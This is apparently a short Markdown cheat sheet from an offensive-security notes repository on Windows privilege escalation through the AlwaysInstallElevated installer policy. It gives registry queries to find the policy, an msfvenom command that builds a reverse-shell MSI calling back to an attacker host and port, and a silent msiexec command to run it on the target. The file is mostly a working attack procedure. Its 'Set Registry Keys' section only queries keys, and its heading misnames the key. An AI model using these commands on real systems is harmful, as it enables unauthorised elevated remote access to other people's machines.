killchain-compendium/exploit/windows/docs/always_installed_elevated.md

25 lines
709 B
Markdown

# AlwaysInstalledElevated
* Watch out for `AlwaysInstalledElevated` keys inside the registry via
```sh
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```
* Prepare reverse shell on attacker as an msi file
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi
```
* start the msi on target
```sh
msiexec /quiet /qn /i C:\Temp\shell.msi
```
## Set Registry Keys
* Alternative method
```sh
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```